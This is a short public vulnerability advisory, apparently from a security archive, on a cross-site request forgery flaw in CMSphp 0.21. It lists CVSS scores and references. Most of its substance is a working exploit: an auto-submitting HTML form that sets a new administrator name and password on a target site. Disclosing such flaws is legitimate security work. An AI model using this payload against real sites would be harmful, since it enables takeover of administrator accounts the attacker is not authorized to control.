CMSphp 0.21 Cross Site Request Forgery Vulnerability

2009-10-04 / 2012-09-17
Credit: Anonymous
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-352


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Author: REMOVED AT REQUEST OF AUTHOR CMS: CMSphp 0.21 Type of vulnerability: Cross site request forgery You can download following cms on : http://webscripts.softpedia.com/script/Content-Management/CMSphp-37567.html CMSphp 0.21 suffers from Cross site request forgery which allows malicious attacker to change admins password Here is exploit *************************begin <form action="[URL]/modules.php?name=Your_account" method="post"> <td><input type="text" name="pseudo" size="30" maxlength="25" value="[ADMIN]"> <input type="text" name="pwd" size="11" maxlength="10" value ="[PASS]"> <input type="hidden" name="op" value="admin_info_user_verif"> <input type="hidden" name="uid" value="1"> <input type="submit" value="Changer"> <script>document.forms[0].submit()</script> ***************************end

References:

http://secunia.com/advisories/36075
http://packetstormsecurity.org/0909-exploits/cmsphp-xsrf.txt


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top